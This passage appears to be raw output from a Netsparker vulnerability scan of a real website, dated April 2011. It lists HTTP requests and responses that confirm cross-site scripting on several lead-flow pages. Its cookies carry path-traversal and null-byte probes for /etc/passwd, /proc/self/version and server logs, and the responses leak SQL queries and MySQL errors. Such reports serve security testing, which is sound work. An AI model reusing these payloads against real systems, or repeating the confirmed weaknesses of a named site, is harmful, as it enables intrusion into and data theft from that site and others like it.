OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gurb5g6oc4fll5lkkl8kar8427; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>' OR prj.project_page_url = 'leadflow/obtm00/?nsextt='"--></style></script><script>netsparker(0x0005CD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?'"--></style></script><script>alert(0x0005D1..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005D1)</script>

Request

GET /ppc/leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rshr0mtdfivohbrpj04nod7ug7; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?'"--></style></script><script>netsparker(0x0005D1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E

/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005D3)</script>

Request

GET /ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005D3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=22s61ink5416l2ifhhk7a4voo3; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>' OR prj.project_page_url = 'leadflow/obtm00/'"--></style></script><script>netsparker(0x0005D3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/

/ppc/leadflow/obtm00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/?'"--></style></script><script>alert(0x0005D6)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005D6)</script>

Request

GET /ppc/leadflow/obtm00/?'"--></style></script><script>netsparker(0x0005D6)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
